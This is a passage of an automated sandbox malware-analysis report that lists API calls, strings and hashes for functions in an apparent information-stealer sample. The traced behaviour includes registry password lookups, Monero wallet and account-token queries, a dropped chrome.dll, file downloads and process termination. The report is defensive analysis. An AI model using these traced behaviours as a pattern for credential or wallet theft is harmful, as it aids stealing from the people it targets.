                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: c61aa46bc3f767992cbd0e2d6255e1225922d3e50a44c9ecf03eb8e3f5d8fc07
                                  • Instruction ID: 2dcc3026387cdc0074771d953c17dc98f83ad246e8f28e7f40957179f560c41a
                                  • Opcode Fuzzy Hash: c61aa46bc3f767992cbd0e2d6255e1225922d3e50a44c9ecf03eb8e3f5d8fc07
                                  • Instruction Fuzzy Hash: F231AFB5940108DBDB18EBE0ED95DFEB3B8EB45301B205228F516B32D9CF30A986DB50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0173DAC8,00000000,?,00E80E14,00000000,?,00000000), ref: 00E782C0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E782C7
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E782E8
                                  • __aulldiv.LIBCMT ref: 00E78302
                                  • __aulldiv.LIBCMT ref: 00E78310
                                  • wsprintfA.USER32 ref: 00E7833C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: 9210f7c31cb42694ba4c72c8b72fca85e5ffe9a4b4e30e157dddd3c33377e0ae
                                  • Instruction ID: 0bb7ee55d34c03c86ce6b41ef673d490d456eac91c4e0abd0fa787610636a5d6
                                  • Opcode Fuzzy Hash: 9210f7c31cb42694ba4c72c8b72fca85e5ffe9a4b4e30e157dddd3c33377e0ae
                                  • Instruction Fuzzy Hash: BE213BB1E44208ABDB14DFD4CD49FAEB7B8FB44B10F108519F219BB2C4C77859008BA4
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E64800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E64889
                                    • Part of subcall function 00E64800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E64899
                                  • InternetOpenA.WININET(00E80DFB,00000001,00000000,00000000,00000000), ref: 00E6615F
                                  • StrCmpCA.SHLWAPI(?,0173E308), ref: 00E66197
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E661DF
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E66203
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00E6622C
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E6625A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00E66299
                                  • InternetCloseHandle.WININET(?), ref: 00E662A3
                                  • InternetCloseHandle.WININET(00000000), ref: 00E662B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: dca7b530a77fde414993dc1c2348cb938690c122001eb7e1bbe90466d92cbfd8
                                  • Instruction ID: 45fdcd5469d0a084ffc4aa56070c93e07000e26c2b32a506b8e1e9188f190c6c
                                  • Opcode Fuzzy Hash: dca7b530a77fde414993dc1c2348cb938690c122001eb7e1bbe90466d92cbfd8
                                  • Instruction Fuzzy Hash: B251D4B1A50208ABDF24DF90DC55FEE77B9AB44345F1080A8F609B71C4DB70AA88CF95
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 00EE024D
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00EE035B
                                  • CatchIt.LIBVCRUNTIME ref: 00EE03AC
                                  • CallUnexpected.LIBVCRUNTIME ref: 00EE04C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2356445960-393685449
                                  • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction ID: 44619974efbc27d58748bb47274ec1fb1232baf416a8fc2bd2b8365c2ec70d63
                                  • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction Fuzzy Hash: 1FB19C3180024DEFCF15DFA6D9819AEBBB5FF08318B14616AE9117B252D3B0DA91CF91
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E6739A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E67411
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E6746D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00E674B2
                                  • HeapFree.KERNEL32(00000000), ref: 00E674B9
                                  • task.LIBCPMTD ref: 00E675B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 0f13e9fd500cbf59b6944b8c32bb4589e721b81a237fb3360d292b16201b06c0
                                  • Instruction ID: 6c237c75401e725c3e66d77b1a1eae61491903e7562cf82197f74cc7b4bb1b3e
                                  • Opcode Fuzzy Hash: 0f13e9fd500cbf59b6944b8c32bb4589e721b81a237fb3360d292b16201b06c0
                                  • Instruction Fuzzy Hash: 47615CB184426C9BDB24DB50DC55BDAB3B8BF44344F0081E9E689B6145EFB06BC9CF90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E778C4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E778CB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0172B958,00000000,00020119,Ix), ref: 00E778EB
                                  • RegQueryValueExA.ADVAPI32(Ix,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E7790A
                                  • RegCloseKey.ADVAPI32(Ix), ref: 00E77914
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber$Ix
                                  • API String ID: 3225020163-4041952297
                                  • Opcode ID: e7a106df18fa5d4758a75dca2d33c3637bcbb32c93aa6f40ddf80662caa854cd
                                  • Instruction ID: 1dda18136a01a668f2f31165ce6dec605a7bc4ea1413592ecd7ff5247f11410a
                                  • Opcode Fuzzy Hash: e7a106df18fa5d4758a75dca2d33c3637bcbb32c93aa6f40ddf80662caa854cd
                                  • Instruction Fuzzy Hash: A70117F5A40309BFEB14DBD4DC49FAE77B8EB44700F1045A4F615A7289D7705A40CB90
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                  • lstrlen.KERNEL32(00000000), ref: 00E6BC6F
                                    • Part of subcall function 00E78FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E78FE2
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E6BC9D
                                  • lstrlen.KERNEL32(00000000), ref: 00E6BD75
                                  • lstrlen.KERNEL32(00000000), ref: 00E6BD89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 4ea3c6001dbb7e17a355f175a2d48e329f8e63bdca157d6628ce40dc50239725
                                  • Instruction ID: d6a482a3ddf5701ca4f5d2b468747b7152cc5e5627722b0f1a924d99e268139f
                                  • Opcode Fuzzy Hash: 4ea3c6001dbb7e17a355f175a2d48e329f8e63bdca157d6628ce40dc50239725
                                  • Instruction Fuzzy Hash: EFB15772910108ABCB14FBA0DD56EEEB3BDAF94300F549578F10A77095EF346A48CB62
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 6d2a0ffdc46077bf1c7e3987296eb2f8c264fa63bd746cac20cdc29265796c4b
                                  • Instruction ID: 72fd303be6c48bce21582bd5ec8055699bd0bed8647804bf0829638eb2439bfd
                                  • Opcode Fuzzy Hash: 6d2a0ffdc46077bf1c7e3987296eb2f8c264fa63bd746cac20cdc29265796c4b
                                  • Instruction Fuzzy Hash: 48F08272908209EFD358DFE0E40975CBB71EB0470BF1142A5F629A61C8D6B04AE0EB51
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E79850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00E708DC,C:\ProgramData\chrome.dll), ref: 00E79871
                                    • Part of subcall function 00E6A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E6A098
                                  • StrCmpCA.SHLWAPI(00000000,01738A48), ref: 00E70922
                                  • StrCmpCA.SHLWAPI(00000000,01738AE8), ref: 00E70B79
                                  • StrCmpCA.SHLWAPI(00000000,017389F8), ref: 00E70A0C
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E70C35
                                  Strings
                                  • C:\ProgramData\chrome.dll, xrefs: 00E70C30
                                  • C:\ProgramData\chrome.dll, xrefs: 00E708CD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                  • API String ID: 585553867-663540502
                                  • Opcode ID: b070531bbf35e648fd627ef185646fc9691a29206d0b64726efe47ff306f81fa
                                  • Instruction ID: c0bbcbeb34a68844bd806778fd35a9596076dafb37f91d21f2f763af4943001b
                                  • Opcode Fuzzy Hash: b070531bbf35e648fd627ef185646fc9691a29206d0b64726efe47ff306f81fa
                                  • Instruction Fuzzy Hash: E8A165717002089FCB28FF64D996EAD77BAAFD5300F14957DE40EAF245DA309A05CB92
                                  APIs
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                  • wsprintfA.USER32 ref: 00E69E7F
                                  • lstrcat.KERNEL32(00000000,?), ref: 00E69F03
                                  • lstrcat.KERNEL32(00000000,?), ref: 00E69F17
                                  • lstrcat.KERNEL32(00000000,00E812D8), ref: 00E69F29
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00E69F7C
                                  • Sleep.KERNEL32(00001388), ref: 00E6A013
                                    • Part of subcall function 00E799A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E799C5
                                    • Part of subcall function 00E799A0: Process32First.KERNEL32(00E6A056,00000128), ref: 00E799D9
                                    • Part of subcall function 00E799A0: Process32Next.KERNEL32(00E6A056,00000128), ref: 00E799F2
                                    • Part of subcall function 00E799A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E79A4E
                                    • Part of subcall function 00E799A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E79A6C
                                    • Part of subcall function 00E799A0: CloseHandle.KERNEL32(00000000), ref: 00E79A79
                                    • Part of subcall function 00E799A0: CloseHandle.KERNEL32(00E6A056), ref: 00E79A88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 531068710-2746444292
                                  • Opcode ID: 5614c4a50a7174ebfcc3fef174f9d6570d7dbc287cfc3c108802a7c96c680bb9
                                  • Instruction ID: debf3ac5750bc9eb5147eb6d632f84512b167def525870d9172ccd66bdbba2d7
                                  • Opcode Fuzzy Hash: 5614c4a50a7174ebfcc3fef174f9d6570d7dbc287cfc3c108802a7c96c680bb9
                                  • Instruction Fuzzy Hash: FF5185B1944318ABEB24DB60DC4AFDA77B8AB44704F044598F60DBB2C1EB759B88CF51
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00EDFA1F
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00EDFA27
                                  • _ValidateLocalCookies.LIBCMT ref: 00EDFAB0
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00EDFADB
                                  • _ValidateLocalCookies.LIBCMT ref: 00EDFB30
